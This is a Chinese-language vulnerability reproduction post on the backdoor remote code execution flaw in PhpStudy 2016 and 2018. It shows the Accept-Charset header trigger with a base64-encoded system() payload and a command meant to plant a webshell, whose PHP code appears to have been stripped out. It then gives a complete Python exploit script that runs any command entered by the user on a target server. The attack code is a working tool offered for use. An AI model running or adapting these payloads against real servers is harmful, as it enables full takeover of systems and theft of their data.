PhpStudy2016-2018-RCE 漏洞复现

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞影响范围

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。

漏洞的具体影响取决于攻击者如何利用该漏洞。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。攻击者可以执行恶意代码、访问和修改敏感数据、植入后门等。

需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。在2019年5月发布的修复版本中,该漏洞被开发者修复。

说明 内容
漏洞编号 phpstudy-2016,2018-RCE
漏洞名称 RCE(Remote Command|Code Execute)
漏洞评级 高危
影响范围 phpStudy 2016-----phpStudy 2018
漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。


 

漏洞环境

链接:https://pan.baidu.com/s/1_kieJmU7Azq-lMKIp9VmaA 
提取码:2hf6 

漏洞复现

具体的版本,和服务器平台就不列出了,大家参考phpinfo的信息 

PhpStudy2016-2018-RCE 漏洞复现_第1张图片

 使用burp抓包,然后重发报文

PhpStudy2016-2018-RCE 漏洞复现_第2张图片

漏洞利用

触发条件

Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
Accept-Encoding: gzip,deflate

tips:这里注意空格

 使用burp编码器构造一条系统执行命令,并且使用base64编码PhpStudy2016-2018-RCE 漏洞复现_第3张图片

 得到

c3lzdGVtKCdpcGNvbmZpZycpOw==

修改数据包后,重放,右边源码发现已经执行ipconfig了

PhpStudy2016-2018-RCE 漏洞复现_第4张图片

漏洞利用

这段代码的作用是将字符串写入到"C:/phpStudy/WWW/shell.php"文件中。这段PHP代码会执行$_POST[cmd]变量中的命令,并将结果进行执行。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。这种代码容易被滥用,例如用于执行恶意命令、破坏或窃取数据。

system(' echo ^>"C:/phpStudy/WWW/shell.php ');

POC

POC是"Proof of Concept"的缩写。在计算机安全领域中,POC通常指的是攻击者或安全研究人员为了验证某个漏洞的存在、利用效果或攻击方法而实现的一个具体演示或证明代码。

接下来为大家展示一下,为了更好的体验效果,我在powershell中演示

当我运行此rce脚本时,显示下方的界面,并提示该工具的用法。

PhpStudy2016-2018-RCE 漏洞复现_第5张图片

当我添加网站后,运行脚本,就会提示输入想要执行的命令,然后回车,就可以执行远程PhpStudy服务器的主机了

PhpStudy2016-2018-RCE 漏洞复现_第6张图片

PhpStudy2016-2018-RCE 漏洞复现_第7张图片

下面是源代码

import requests
import base64
import sys

banner = '''
.---. .-.          .--.  .-.          .-.        .---.  .--.  .--. 
: .; :: :         : .--'.' `.         : :        : .; :: .--': .--'
:  _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-.  :   .': :   : `;  
: :   : .. :: .; ` _`, : : : : :; :' .; :: :; :  : :.`.: :__ : :__ 
:_;   :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ;  :_;:_;`.__.'`.__.'
            : :                           .-. :                    
            :_;                           `._.'                    
                python *.py http://192.168.21.155/phpinfo.php
'''

if len(sys.argv) < 2:
    print(banner)
    exit()

url = sys.argv[1]

def attack(cmd):
    cmd = f"system('{cmd}');"
    cmd = base64.b64encode(cmd.encode())

    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }

    res = requests.get(url = url,headers = headers)
    rs = res.content.decode("gb2312")
    result = rs[0:rs.find("DOCTYPE html")]
    return result

if __name__ == '__main__':
    cmd = input("请输入想要执行的系统命令:")
    if cmd == 'q':
        print("感谢使用!!!")
    else:
        print(attack(cmd))

你可能感兴趣的:(网络安全,安全,python,网络安全)